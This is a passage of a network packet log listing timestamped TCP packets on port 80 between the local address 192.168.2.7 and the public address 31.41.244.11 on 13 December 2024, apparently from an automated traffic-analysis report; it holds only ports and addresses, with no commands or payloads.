Dec 13, 2024 18:53:45.517007113 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.517052889 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.517124891 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.517168999 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.518073082 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.518119097 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.518199921 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.518239021 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.519053936 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.519102097 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.519176006 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.519220114 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.520015955 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.520073891 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.520096064 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.521212101 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.521260977 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.521372080 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.521413088 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.522104025 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.522151947 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.522186995 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.522226095 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.523132086 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.523180008 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.523257971 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.523298979 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.524260044 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.524328947 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.524388075 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.525383949 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.525433064 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.525473118 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.525513887 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.526199102 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.526245117 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.526267052 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.526289940 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.527153015 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.527205944 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.527250051 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.527354002 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.528167009 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.528228998 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.528341055 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.529297113 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.529350042 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.529426098 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.529475927 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.530190945 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.530241966 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.530359030 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.530400991 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.531537056 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.531588078 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.531610966 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.531650066 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.532519102 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.532582998 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.532601118 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.533267975 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.533318996 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.533360004 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.533401966 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.534298897 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.534370899 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.534409046 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.534482002 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.535397053 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.535445929 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.535487890 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.535527945 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.536344051 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.536406994 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.536464930 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.536712885 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.537440062 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.537612915 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.537655115 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.538744926 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.538789988 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.538892984 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.538934946 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.540016890 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.540071964 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.540076971 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.540832043 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.540884972 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.540921926 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.540962934 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.541712046 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.541765928 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.541769981 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.541809082 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.542501926 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.542550087 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.542578936 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.542619944 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.543584108 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.543633938 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.543718100 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.543756008 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.544584036 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.544694901 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.544723034 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.545623064 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.545671940 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.545753002 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.545790911 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.546773911 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.546824932 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.546993017 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.547066927 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.547631979 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.547682047 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.547791958 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.547852993 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.548638105 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.548724890 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.548772097 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.549741030 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.549787998 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.549797058 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.549841881 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.550789118 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.550829887 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.550935984 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.550981998 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.551841974 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.551899910 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.551945925 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.552445889 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.552903891 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.552958012 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.552994967 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.553035975 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.553875923 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.553935051 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.553966999 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.554060936 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.554861069 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.554927111 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.555016041 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.555062056 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.555915117 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.556057930 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.556112051 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.556880951 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.557310104 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.699193001 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.699285030 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.699311972 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.699342012 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.699604988 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.699863911 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.699920893 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.699968100 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.700037003 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.700882912 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.700922966 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.700985909 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.701025963 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.701952934 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.701992989 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.706253052 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.706379890 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.706429958 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.706773996 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.706820965 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.706968069 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.707006931 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.707712889 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.707755089 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.707830906 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.707880020 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.708765030 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.709067106 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.709115982 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.709157944 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.709197044 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.710094929 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.710141897 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.710169077 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.710205078 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.711122990 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.711165905 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.711213112 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.711250067 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.712141991 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.712198019 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.712462902 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.712557077 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.712595940 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.713486910 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.713531971 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.713608980 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.713646889 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.714498997 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.714540958 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.714648008 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.714684963 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.715719938 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.715766907 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.715837955 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.715892076 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.716682911 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.716787100 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.716831923 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.717576027 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.717619896 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.717683077 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.717720032 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.718641996 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.718686104 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.718825102 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.718863964 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.719655037 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.719697952 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.719739914 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.719779015 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.720685959 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.720741034 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.720808029 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.721715927 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.721759081 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.721769094 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.721801043 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.722709894 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.722763062 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.722804070 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.722845078 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.723717928 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.723762989 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.723828077 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.723882914 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.724795103 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.724873066 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.724946976 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.725821018 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.725869894 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.726063013 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.726109982 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.726797104 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.726840019 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.726912022 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.726952076 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.727850914 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.727905035 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.727982044 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.728828907 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.728884935 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.728928089 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.728971004 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.729871035 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.729921103 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.729963064 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.730230093 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.730930090 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.730977058 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.731168985 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.731209993 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.731985092 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.732042074 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.732067108 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.732986927 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.733032942 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.733145952 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.733191967 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.733973980 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.734020948 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.734093904 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.734136105 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.735057116 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.735114098 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.735189915 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.735230923 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.735999107 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.736067057 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.736129045 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.737219095 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.737272978 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.737350941 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.737396002 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.738251925 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.738297939 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.738353968 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.738394976 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.739072084 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.739115953 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.739172935 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.739212990 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.740107059 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.740166903 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.740263939 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.741130114 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.741177082 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.741209984 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.741251945 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.742187023 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.742230892 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.742302895 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.742345095 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.743185043 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.743228912 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.743309975 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.743352890 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.744260073 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.744316101 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.744398117 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.745219946 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.745265007 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.745321035 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.745362043 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.746263027 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.746306896 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.746383905 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.746427059 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.747356892 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.747400045 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.747436047 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.747481108 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.748544931 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.748599052 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.748646021 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.749764919 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.749808073 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.749917030 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.749958992 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.750816107 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.750878096 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.751039982 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.751085997 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.752055883 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.752114058 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.752119064 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.752827883 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.752870083 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.753048897 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:45.753088951 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:45.754061937 CET	80	49895	31.41.244.11	192.168.2.7
